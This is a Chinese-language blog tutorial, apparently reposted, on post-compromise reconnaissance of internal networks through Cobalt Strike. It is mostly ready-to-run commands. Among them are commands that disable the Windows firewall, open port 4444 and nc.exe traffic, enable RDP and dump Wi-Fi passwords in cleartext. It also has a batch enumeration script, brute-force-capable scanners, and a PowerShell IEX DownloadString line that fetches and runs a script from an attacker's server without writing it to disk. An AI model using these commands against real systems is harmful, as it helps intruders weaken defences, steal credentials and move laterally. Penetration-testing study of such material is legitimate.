当前位置:   article > 正文

内网信息收集:手动、脚本和工具查IP、端口

内网信息收集:手动、脚本和工具查IP、端口

1.手动查IP和端口

2.工具查IP

3.工具查端口



我们在内网中拿下目标机器后,需要进行一系列的信息收集,以下为总结的收集方法

1.手动信息收集:

以下命令在CS执行时命令前须加shell,如:shell ipconfig

1.收集IP网卡: ipconfig

2.收集操作系统和软件信息: systeminfo

3.查看操作系统的体系结构:echo %PROCESSOR_ARCHITECTURE%

4.查看目录和文件夹:shell dir shell type 文件名

5.查看操作系统的软件及版本信息:

powershell "Get‐WmiObject ‐class win32_product | Select‐Object ‐Property name,version"

6.本机的服务信息: wmic service list brief

7.查看进程信息: wmic process list brief/tasklist

8.查看启动程序信息: wmic startup get command,caption

9.计划任务信息:schtasks /query /fo LIST /v

10.查看主机开机信息:shell net statistics workstation

11.查看用户列表:shell user/wmic useraccount get name ,SID

12.查看会话:net session

13.查看端口:netstat -ano

14.查看补丁信息:systeminfo 或者

 wmic qfe get Caption,Description,HotFixID,InstalledOn

15.查看共享列表:netshare / wmic share get name,path,status(可能横向移动)

16.路由信息: route print

防火墙相关操作:

1.查看防火墙是否开启: netsh firewall show state

2.关闭防火墙:  

Windows server 2003:     netsh firewall set opmode disable

Windows server 2003之后:  netsh firewall set opmode disable 或者netsh advfirewall set allprofiles state off

3.查看防火墙配置: netsh firewall show config

4.修改防火墙:

2003之前版本,允许指定程序进行全部连接:

netsh firewall add allowedprogram c:\nc.exe "allownc" enable 

2003之后版本,允许指定程序连接:

 netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"

允许指定程序退出:

 netsh advfirewall firewall add rule name="Allownc" dir=out action=allow program="C: \nc.exe"

允许3389端口放行:

 netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow

允许4444端口进站:

 netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=4444

允许4444端口出站:

 netsh advfirewall firewall add rule name=test dir=out action=allow protocol=tcp localport=4444

允许a.exe进站:

shell netsh advfirewall firewall add rule name=test dir=in action=allow program=c:\a.exe

允许a.exe出站:

shell netsh advfirewall firewall add rule name=test dir=out action=allow 

program=c:\a.exe

开启远程服务:

1.2003机器:

wmic path win32_terminalservicesetting where (_CLASS !="") call setallowtsconnections 1

2.在server2008和server 2021:

开启:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

WIFI密码收集:

 for /f  "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles')  do  @echo %j | findstr ‐i ‐v echo |  netsh wlan show profiles %j key=clear

查询RDP端口:

 reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP‐Tcp" /V PortNumber

注意: oxd3d为3389端口

查看代理信息:

 reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

查看登录凭证:

shell cmdkey /l

ARP信息: arp-a

最近打开的文档:

 dir %APPDATA%\Microsoft\Windows\Recent

查询本机用户组: net localgroup

管理员组成员列表:net localgroup administrators

RDP凭证:net localgroup administrators

杀毒软件查询: wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname /format:list

命令太多记不全,在目标机器创建一个bat脚本执行:

  1. for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set
  2. "var=%%A"
  3. wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >>
  4. out.html
  5. wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName
  6. /format:"%var%" >> out.html
  7. wmic USERACCOUNT list full /format:"%var%" >> out.html
  8. wmic group list full /format:"%var%" >> out.html
  9. wmic nicconfig where IPEnabled='true' get
  10. Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,M
  11. ACAddress /format:"%var%" >> out.html
  12. wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace
  13. /format:"%var%" >> out.html
  14. wmic netuse list full /format:"%var%" >> out.html
  15. wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >>
  16. out.html
  17. wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
  18. wmic PRODUCT get
  19. Description,InstallDate,InstallLocation,PackageCache,Vendor,Version
  20. /format:"%var%" >> out.html
  21. wmic os get
  22. name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUse
  23. r,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
  24. wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >>
  25. out.html

输出一个out.html网址,打开即为收集的信息,

也可以自己编写,这是一个简单的示例,可以将上面自己需要的命令写上去,导入到1.txt文件,执行以后查看即可:

2.工具查IP:

1.NetBIOS

这是一款用于扫描Windows网络上NetBIOS名字信息的程序。该程序对给出范围内的每一个地址发 送NetBIOS状态查询,并且以易读的表格列出接收到的信息,对于每个响应的主机,NBTScan列出 它的IP地址、NetBIOS计算机名、登录用户名和MAC地址。但只能用于局域网,NBTSCAN可以取到 PC的真实IP地址和MAC地址,如果有”ARP攻击”在做怪,可以找到装有ARP攻击的PC的IP/和 MAC地址。但只能用于局域网 

nbtscan扫描:nbtscan.exe IP 

2.ICMP

除了利用NetBIOS探测内网,还可以利用ICMP协议探测内网。依次对内网中的每个IP地址执行ping 命令,可以快速找出内网中所有存活酌主机。在渗透测试中中,可以使用如下命令循环探测整个C段

直接用就行:for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

3.ARP

使用arp协议进行IP探测,这个需要下载脚本

直接用:arp.exe -t IP/24

4.Kscan kscan

是一款资产]测绘工具,可针对指定资产进行端口扫描以及TCP指纹识别和Banner抓取,在不 发送更多的数据包的情况下尽可能的获取端口更多信息。并能够针对扫描结果进行自动化暴力破解, 且是go平台首款开源的RDP暴力破解工具 

下载地址:https://github.com/lcvvvv/kscan

利用:kscanw64.exe -t IP/24 --encoding gb2312(不乱码)

探测网段:kscanw64.exe --spy

其实Kscan还有很多用法,这里只是进行IP扫描,其他用法不再赘述,可以参考:

Kscan-简单的资产测绘工具_kscan使用方法-CSDN博客

5.fscan

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服 务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、 web漏洞扫描、netbios探测、域控识别等功能。

下载地址 https://github.com/lcvvvv/kscan

fscan扫描:fscan64.exe -h IP/24      它也有很多用法,参考以下:

fscan工具的使用_fscan使用-CSDN博客

6. Ladon

一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密 码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主 机、域名列表扫描。7.5版本内置100个功能模块,外部模块18个,通过多种协议以及方法快速获取目标 网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间 件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、SMBGhost、Weblogic、 ActiveMQ、Tomcat、Struts2系列等,密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、 SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、 BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(wmiexe/psexec/atexec/sshexec /jspshell),Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度 自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配 置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支 持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

利用:Lodan.exe IP/24 icmp    

使用参考:Ladon使用_ladon使用教程-CSDN博客

3.工具查端口

1.ScanLine

是一款windows下的端口扫描的命令行程序。它可以完成PING扫描、TCP端口扫描、UDP端口扫描等功 能。运行速度很快,不需要winPcap库支持,应用场合受限较少。

利用:

scanline.exe ‐bhpt 21‐23,25,80,110,135‐139,143,443,445,1433,1521,3306,3389,5556,5631,5900,8080  100.100.0.3

scanline.exe ‐bhpt 80,443 100.100.0.1‐254(IP)

scanline.exe ‐bhpt 139,445  IP

其他用法:

‐?         ‐ 显示此帮助文本

‐b          ‐ 获取端口横幅

‐c          ‐ TCP 和 UDP 尝试超时(毫秒)。 默认值为 4000

‐d          ‐ 扫描之间的延迟(毫秒)。 默认为 0

‐f          ‐ 从文件中读取 IP。 使用“stdin”作为标准输入

‐g          ‐ 绑定到给定的本地端口

‐h          ‐ 隐藏没有开放端口的系统的结果

‐i          ‐ 除了 Echo 请求之外,用于 ping 使用 ICMP 时间戳请求

‐j          ‐ 不要在 IP 之间输出“‐‐‐‐‐...”分隔符

‐l          ‐ 从文件中读取 TCP 端口

‐L          ‐ 从文件中读取 UDP 端口

‐m          ‐ 绑定到给定的本地接口 IP

‐n          ‐ 不扫描端口 ‐ 仅 ping(除非您使用 ‐p)

‐o          ‐ 输出文件(覆盖)

‐O          ‐ 输出文件(追加)

‐p          ‐ 扫描前不要 ping 主机

‐q          ‐ ping 超时(毫秒)。 默认值为 2000

‐r          ‐ 将 IP 地址解析为主机名

‐s          ‐ 以逗号分隔格式输出 (csv)

‐t          ‐ 要扫描的 TCP 端口(以逗号分隔的端口/范围列表) ‐T          ‐ 使用 TCP 端口的内部列表

‐u          ‐ 要扫描的 UDP 端口(以逗号分隔的端口/范围列表)

‐U          ‐ 使用 UDP 端口的内部列表

‐v          ‐ 详细模式

‐z          ‐ 随机化 IP 和端口扫描顺序 

2.PowerSpioit PowerSploit

是一款基于PowerShell的后渗透框架软件,包含了很多PowerShell的攻击脚本,它们主要用于渗透中 的信息侦测,权限提升、权限维持等

下载地址: https://github.com/PowerShellMafia/PowerSploit

用法:

ActivirusBypass:发现杀毒软件的查杀特征     

CodeExecution:在目标主机上执行代码     

Exfiltration:目标主机上的信息搜集工具     

Mayhem:蓝屏等破坏性的脚本     

Persistence:后门脚本     

Privsec:提权等脚本     

Recon:以目标主机为跳板进行内网信息侦查     

ScriptModification:在目标主机上创建或修改脚本

本地执行(放到目标服务器):

shell powershell ‐exec bypass Import‐Module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

远程执行(不需要放到目标服务器,放到公网服务器,无文件加载):

powershell ‐exec bypass ‐c IEX (New‐Object 

System.Net.Webclient).DownloadString('IP:PORT/Invoke‐Portscan.ps1');import‐module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

3.Nishang Nishang

是一款针对PowerShell的渗透工具。说到渗透工具,那自然便是老外开发的东西。国人开发的东西,也不 是不行,只不过不被认可罢了。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源 什么的都不重要。总之,nishang也是一款不可多得的好工具。非常的好用。

下载地址 https://github.com/samratashok/nishang

利用:

CS上传,只能传ZIP,不能传文件

解压:shell unzip nishang.zip

使用方法:

允许导入:shell powershell Set‐ExecutionPolicy remotesigned   

扫描:

shell powershell ‐command "& { import‐module .\nishang\nishang.psm1; Invoke‐PortScan ‐StartAddress 192.168.11.1 ‐EndAddress 192.168.11.255 -Ports 445 ‐ResolveHost }"

另一种方式:先将nishang导入到CS目录里面:

导入模块:powershell -import .\nishang\nishang.psm1 (不需要再上传服务器)

扫描同上

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/黑客灵魂/article/detail/824764
推荐阅读
相关标签
  

闽ICP备14008679号